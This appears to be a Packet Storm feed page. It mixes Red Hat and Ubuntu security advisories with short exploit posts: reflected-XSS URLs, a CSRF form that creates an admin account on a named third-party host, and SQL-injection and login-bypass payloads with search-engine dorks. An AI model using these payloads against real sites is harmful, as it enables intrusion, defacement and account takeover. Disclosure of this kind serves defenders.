Red Hat Security Advisory 2023-4448-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.120 and .NET Runtime 6.0.20. Issues addressed include code execution, denial of service, and heap corruption vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: .NET 6.0 security update  
Advisory ID:       RHSA-2023:4448-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:4448  
Issue date:        2023-08-03  
CVE Names:         CVE-2023-29331 CVE-2023-29337 CVE-2023-33128   
                   CVE-2023-33170   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 8.6  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder EUS (v.8.6) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream EUS (v.8.6) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.120 and .NET Runtime  
6.0.20.

Security Fix(es):

* dotnet: .NET Kestrel: Denial of Service processing X509 Certificates  
(CVE-2023-29331)

* dotnet: vulnerability exists in NuGet where a potential race condition  
can lead to a symlink attack (CVE-2023-29337)

* dotnet: Remote Code Execution - Source generators issue can lead to a  
crash due to unmanaged heap corruption (CVE-2023-33128)

* dotnet: race condition in Core SignInManager<TUser> PasswordSignInAsync  
method (CVE-2023-33170)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2212617 - CVE-2023-29331 dotnet: .NET Kestrel: Denial of Service processing X509 Certificates  
2212618 - CVE-2023-33128 dotnet: Remote Code Execution - Source generators issue can lead to a crash due to unmanaged heap corruption  
2213703 - CVE-2023-29337 dotnet: vulnerability exists in NuGet where a potential race condition can lead to a symlink attack  
2221854 - CVE-2023-33170 dotnet: race condition in Core SignInManager<TUser> PasswordSignInAsync method

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.6):

Source:  
dotnet6.0-6.0.120-1.el8_6.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.20-1.el8_6.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.20-1.el8_6.aarch64.rpm  
dotnet-6.0.120-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.20-1.el8_6.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-host-6.0.20-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.20-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-6.0.20-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-6.0.120-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.120-1.el8_6.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.20-1.el8_6.aarch64.rpm  
dotnet-templates-6.0-6.0.120-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.120-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.120-1.el8_6.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.120-1.el8_6.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.20-1.el8_6.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.20-1.el8_6.s390x.rpm  
dotnet-6.0.120-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.20-1.el8_6.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-host-6.0.20-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-6.0.20-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-6.0.20-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-6.0.120-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.120-1.el8_6.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.20-1.el8_6.s390x.rpm  
dotnet-templates-6.0-6.0.120-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.120-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.120-1.el8_6.s390x.rpm  
netstandard-targeting-pack-2.1-6.0.120-1.el8_6.s390x.rpm

x86_64:  
aspnetcore-runtime-6.0-6.0.20-1.el8_6.x86_64.rpm  
aspnetcore-targeting-pack-6.0-6.0.20-1.el8_6.x86_64.rpm  
dotnet-6.0.120-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-6.0.20-1.el8_6.x86_64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-host-6.0.20-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-6.0.20-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-6.0.20-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-6.0.120-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.120-1.el8_6.x86_64.rpm  
dotnet-targeting-pack-6.0-6.0.20-1.el8_6.x86_64.rpm  
dotnet-templates-6.0-6.0.120-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.120-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.120-1.el8_6.x86_64.rpm  
netstandard-targeting-pack-2.1-6.0.120-1.el8_6.x86_64.rpm

Red Hat CodeReady Linux Builder EUS (v.8.6):

aarch64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-host-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.20-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.120-1.el8_6.aarch64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.120-1.el8_6.aarch64.rpm  
dotnet6.0-debuginfo-6.0.120-1.el8_6.aarch64.rpm  
dotnet6.0-debugsource-6.0.120-1.el8_6.aarch64.rpm

s390x:  
dotnet-apphost-pack-6.0-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-host-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.20-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.120-1.el8_6.s390x.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.120-1.el8_6.s390x.rpm  
dotnet6.0-debuginfo-6.0.120-1.el8_6.s390x.rpm  
dotnet6.0-debugsource-6.0.120-1.el8_6.s390x.rpm

x86_64:  
dotnet-apphost-pack-6.0-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-host-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.20-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.120-1.el8_6.x86_64.rpm  
dotnet-sdk-6.0-source-built-artifacts-6.0.120-1.el8_6.x86_64.rpm  
dotnet6.0-debuginfo-6.0.120-1.el8_6.x86_64.rpm  
dotnet6.0-debugsource-6.0.120-1.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-29331  
https://access.redhat.com/security/cve/CVE-2023-29337  
https://access.redhat.com/security/cve/CVE-2023-33128  
https://access.redhat.com/security/cve/CVE-2023-33170  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJky2MkAAoJENzjgjWX9erEOCQP/3AanxSwE94uvS2bOptjaKqt  
4/7+4y0quod+20qeyC06XS9YMOUgdSi7pCwHiimVoX2TuvXvgTY/J2pXSb484F7s  
mgasguscPN3iwc6db0Qu/R33vDDwE8E96V0wb4/kXA3s8MgK6S2+j3AXF4WyXr5x  
x9t6lNA4IjO52aFx2oEfqAGvYaucC6KqwWiK0O9Mg2StpZr25wSfW75xoC2FAxNi  
vHgzVPx/E1A00jRB0lif88IQR3CTJfsuea1axkY79NmztTyFiqTWt39vDV1Yklh9  
UiMkcVygqR3vM32Ofl3BMqZOzkpUXgBvdd89XEHqpOEWLp+Pqm8/kGF7VdH82MD3  
wX/GU2sC5XkdRlWBCU/Jt3VEGOGUFfGxq2D8yKrS1AdI+ogZar8gENz0g4NlUp9j  
rkBWm7wXbHNA/LnC+csjkeIHHFygOU+FV8hu+SrJ4wC3JP8BqLtp8Pz2QJ0aUUTl  
TJXPOefg3u9A2X75fnywTofTIjLsNqsQI4qm3E6Ejvj//v2h/VSD7r1GPa8cqW6r  
96AkQGeucc4g8oFhDf9OTyXxrKJh3yrQlUPnWQJJtD1h5cDMPyYzicx4GYjcHfZ7  
V1zcy25rpqg9PUjlTkUBNy8C1m9YSt6B7kQLnyOz62AqL/D8Y7PEsAsBaCWlRYHf  
3AT9DfNjpIByNGCM6tOO  
=6yxm  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-4448-01

PHPJabbers Taxi Booking version 2.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Taxi Booking 2.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 22/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/taxi-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4116## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionSearch&locale=1&index=[XSS][-] Done

PHPJabbers Taxi Booking 2.0 Cross Site Scripting

PHPJabbers Cleaning Business version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Cleaning Business 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/cleaning-business-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4115## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Cleaning Business 1.0 Cross Site Scripting

WebCalendar version 1.3 suffers from a cross site request forgery vulnerability.

====================================================================================================================================| # Title     : WebCalendar v1.3 CSRF Vulnerability                                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://github.com/craigk5n/webcalendar/archive/master.zip                                                         |  | # Dork      : WebCalendar v1.3                                                                                                   |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code create a new admin .[+] Go to the line 173.[+] Set the target site link Save changes and apply . [+] infected file : install/index.php.[+] http://127.0.0.1/q7.3/admin/settings.php.[+] save code as poc.html .[+] <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"  "DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">  <head>    <title>WebCalendar Setup Wizard</title>    <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />    <script>    </script>    <script src="../includes/js/visible.js"></script>    <style>      body {        margin:0;        background:#fff;        font-family:Arial, Helvetica, sans-serif;      }      table {        border:0;      }      th.header,      th.pageheader,      th.redheader {        background:#eee;      }      th.pageheader {        padding:10px;        font-size:18px;      }      th.header,      th.redheader {        font-size:14px;      }      th.redheader,      .notrecommended {        color:red;      }      td {        padding:5px;      }      td.prompt,      td.subprompt {        padding-right:20px;        font-weight:bold;      }      td.subprompt {        font-size:12px;      }      div.nav {        margin:0;        border-bottom:1px solid #000;      }      div.main {        margin:10px;      }      li {        margin-top:10px;      }      doc.li {        margin-top:5px;      }      .recommended {        color:green;      }    </style>  </head>  <body onload="auth_handler();">    <table border="1" width="90%" class="aligncenter">      <th class="pageheader" colspan="2">WebCalendar Installation Wizard Step 4</th>      <tr>        <td colspan="2" width="50%">This is the final step in setting up your WebCalendar Installation.</td>      </tr>      <th class="header" colspan="2">Application Settings</th>      <tr>        <td colspan="2">          <ul><li>HTTP-based authentication was not detected. You will need to reconfigure your web server if you wish to select 'Web Server' from the 'User Authentication' choices below.</li></ul>        </td>      </tr>      <tr>        <td>          <table width="75%" class="aligncenter">            <tr>            <form action="http://phase.ups-tlse.fr/webcalendar/install/index.php?action=switch&page=4" method="post" enctype='multipart/form-data' name="form_app_settings">              <input type="hidden" name="app_settings" value="1" />              <td class="prompt">Create Default Admin Account:</td>              <td>                <input type="checkbox" name="load_admin" value="Yes" />                <span class="notrecommended"> (Admin Account Not Found)</span>              </td>            </tr>            <tr>              <td class="prompt">Application Name:</td>              <td><input type="text" size="40" name="form_application_name" id="form_application_name" value="Hacked By Indoushka" /></td>            </tr>            <tr>              <td class="prompt">Server URL:</td>              <td><input type="text" size="40" name="form_server_url" id="form_server_url" value="http://phase.ups-tlse.fr/webcalendar/" /></td>            </tr>            <tr>              <td class="prompt">User Authentication:</td>              <td>                <select name="form_user_inc" onChange="auth_handler()">                  <option value="user.php" selected="selected">Web-based via WebCalendar (default)</option>                  <option value="http">Web Server (not detected)</option>                  <option value="user-imap.php">IMAP</option>                  <option value="none" >None (Single-User)</option>                </select>              </td>            </tr>            <tr id="singleuser">              <td class="prompt">&nbsp;&nbsp;&nbsp;Single-User Login:</td>              <td><input name="form_single_user_login" size="20" value="" /></td>            </tr>            <tr>              <td class="prompt">Read-Only:</td>              <td>                <input name="form_readonly" value="true" type="radio" />Yes&nbsp;&nbsp;&nbsp;&nbsp;                <input name="form_readonly" value="false" type="radio" checked="checked" />No              </td>            </tr>            <tr>              <td class="prompt">Environment:</td>              <td>                <select name="form_mode">                  <option value="prod" selected="selected">Production</option>                  <option value="dev">Development</option>                </select>              </td>            </tr>          </table>        </td>      </tr>    </table>    <table width="80%" class="aligncenter">      <tr>        <td class="aligncenter">              <input name="action" type="button" value="Save Settings" onClick="return validate();" />              <input type="button" value="Logout" onclick="document.location.href='index.php?action=logout'" />            </form>        </td>      </tr>    </table>  </body></html>Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCalendar 1.3 Cross Site Request Forgery

WebCoder CMS version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : WebCoder CMS v1.0 Sql Injection Vulnerability                                                                      || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 63.0.3 (32-bit)                                            || # Vendor    : https://codecanyon.net/item/webcoder-fully-customizable-cms/22745929                                               |  ====================================================================================================================================poc :[+]  Dorking İn Google Or Other Search Enggine .[+]  use payload : /%5c/faq[+]  https://cmswebcoderaz/%5c/faqGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCoder CMS 1.0 SQL Injection

WebCom CMS version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : WebCom CMS v1.0 Auth By pass Vulnerability                                                                         || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit)                                             || # Vendor    : https://codecanyon.net/                                                                                            || # Dork      : "Powered by Web.Com(India) Pvt. Ltd"                                                                               |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : user : admin'-- - & Pass : indoushka[+] http://winternationalhospcom/admin/Greetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

WebCom CMS 1.0 SQL Injection

PHPJabbers Night Club Booking version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Night Club Booking 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/night-club-booking-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4114## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFront&action=pjActionSearch&session_id=&locale=1&index=[XSS]&date=[-] Done

PHPJabbers Night Club Booking 1.0 Cross Site Scripting

PHPJabbers Service Booking Script version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Service Booking Script 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 21/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/service-booking-script/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4113## GreetingsThe_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL , MoizSid09, indoushka  CryptoJob (Twitter) twitter.com/0x0CryptoJob## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpGET parameter 'index' is vulnerable to RXSShttps://website/index.php?controller=pjFrontPublic&action=pjActionServices&locale=1&index=[XSS][-] Done

PHPJabbers Service Booking Script 1.0 Cross Site Scripting

PHPJabbers Shuttle Booking Software version 1.0 suffers from a cross site scripting vulnerability.

    # Exploit Title: PHPJabbers Shuttle Booking Software 1.0 - Reflected XSS# Exploit Author: CraCkEr# Date: 20/07/2023# Vendor: PHPJabbers# Vendor Homepage: https://www.phpjabbers.com/# Software Link: https://www.phpjabbers.com/shuttle-booking-software/# Tested on: Windows 10 Pro# Impact: Manipulate the content of the site# CVE: CVE-2023-4112## DescriptionThe attacker can send to victim a link containing a malicious URL in an email or instant messagecan perform a wide variety of actions, such as stealing the victim's session token or login credentialsPath: /index.phpURL parameter is vulnerable to RXSShttps://website/index.php/gm5rj"><script>alert(1)</script>bwude?controller=pjAdmin&action=pjActionLogin&err=1[-] Done

PHPJabbers Shuttle Booking Software 1.0 Cross Site Scripting

Ubuntu Security Notice 6268-1 - It was discovered that GStreamer Base Plugins incorrectly handled certain FLAC image tags. A remote attacker could use this issue to cause GStreamer Base Plugins to crash, resulting in a denial of service, or possibly execute arbitrary code. It was discovered that GStreamer Base Plugins incorrectly handled certain subtitles. A remote attacker could use this issue to cause GStreamer Base Plugins to crash, resulting in a denial of service, or possibly execute arbitrary code.

    ==========================================================================Ubuntu Security Notice USN-6268-1August 02, 2023gst-plugins-base1.0 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 23.04- Ubuntu 22.04 LTS- Ubuntu 20.04 LTSSummary:GStreamer Base Plugins could be made to crash or run programs if it openeda specially crafted file.Software Description:- gst-plugins-base1.0: GStreamer pluginsDetails:It was discovered that GStreamer Base Plugins incorrectly handled certainFLAC image tags. A remote attacker could use this issue to cause GStreamerBase Plugins to crash, resulting in a denial of service, or possiblyexecute arbitrary code. (CVE-2023-37327)It was discovered that GStreamer Base Plugins incorrectly handled certainsubtitles. A remote attacker could use this issue to cause GStreamer BasePlugins to crash, resulting in a denial of service, or possibly executearbitrary code. (CVE-2023-37328)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 23.04:   gstreamer1.0-plugins-base       1.22.1-1ubuntu1.1Ubuntu 22.04 LTS:   gstreamer1.0-plugins-base       1.20.1-1ubuntu0.1Ubuntu 20.04 LTS:   gstreamer1.0-plugins-base       1.16.3-0ubuntu1.2In general, a standard system update will make all the necessary changes.References:   https://ubuntu.com/security/notices/USN-6268-1   CVE-2023-37327, CVE-2023-37328Package Information:   https://launchpad.net/ubuntu/+source/gst-plugins-base1.0/1.22.1-1ubuntu1.1   https://launchpad.net/ubuntu/+source/gst-plugins-base1.0/1.20.1-1ubuntu0.1   https://launchpad.net/ubuntu/+source/gst-plugins-base1.0/1.16.3-0ubuntu1.2

Source

Packet Storm